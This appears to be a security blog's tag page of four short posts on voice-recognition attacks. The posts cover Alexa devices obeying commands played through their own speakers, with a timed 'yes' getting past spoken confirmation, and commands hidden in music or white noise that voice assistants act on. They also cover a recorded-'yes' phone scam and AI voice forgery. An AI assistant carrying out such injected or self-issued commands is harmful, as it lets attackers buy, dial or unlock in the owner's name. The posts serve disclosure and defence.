Entries Tagged "voice recognition"

Page 1 of 1

Hacking Alexa through Alexa’s Speech

An Alexa can respond to voice commands it issues. This can be exploited:

The attack works by using the device’s speaker to issue voice commands. As long as the speech contains the device wake word (usually “Alexa” or “Echo”) followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway University in London and Italy’s University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it’s trivial to bypass the measure by adding the word “yes” about six seconds after issuing the command. Attackers can also exploit what the researchers call the “FVV,” or full voice vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.

It does require proximate access, though, at least to set the attack up:

It requires only a few seconds of proximity to a vulnerable device while it’s turned on so an attacker can utter a voice command instructing it to pair with an attacker’s Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands.

Research paper.

Posted on March 7, 2022 at 6:20 AMView Comments

Sending Inaudible Commands to Voice Assistants

Researchers have demonstrated the ability to send inaudible commands to voice assistants like Alexa, Siri, and Google Assistant.

Over the last two years, researchers in China and the United States have begun demonstrating that they can send hidden commands that are undetectable to the human ear to Apple’s Siri, Amazon’s Alexa and Google’s Assistant. Inside university labs, the researchers have been able to secretly activate the artificial intelligence systems on smartphones and smart speakers, making them dial phone numbers or open websites. In the wrong hands, the technology could be used to unlock doors, wire money or buy stuff online ­—simply with music playing over the radio.

A group of students from University of California, Berkeley, and Georgetown University showed in 2016 that they could hide commands in white noise played over loudspeakers and through YouTube videos to get smart devices to turn on airplane mode or open a website.

This month, some of those Berkeley researchers published a research paper that went further, saying they could embed commands directly into recordings of music or spoken text. So while a human listener hears someone talking or an orchestra playing, Amazon’s Echo speaker might hear an instruction to add something to your shopping list.

Posted on May 15, 2018 at 6:13 AMView Comments

Stealing Voice Prints

This article feels like hyperbole:

The scam has arrived in Australia after being used in the United States and Britain.

The scammer may ask several times “can you hear me?”, to which people would usually reply “yes.”

The scammer is then believed to record the “yes” response and end the call.

That recording of the victim’s voice can then be used to authorise payments or charges in the victim’s name through voice recognition.

Are there really banking systems that use voice recognition of the word “yes” to authenticate? I have never heard of that.

Posted on May 12, 2017 at 6:00 AMView Comments

Forging Voice

LyreBird is a system that can accurately reproduce the voice of someone, given a large amount of sample inputs. It’s pretty good—listen to the demo here—and will only get better over time.

The applications for recorded-voice forgeries are obvious, but I think the larger security risk will be real-time forgery. Imagine the social engineering implications of an attacker on the telephone being able to impersonate someone the victim knows.

I don’t think we’re ready for this. We use people’s voices to authenticate them all the time, in all sorts of different ways.

EDITED TO ADD (5/11): This is from 2003 on the topic.

Posted on May 4, 2017 at 10:31 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.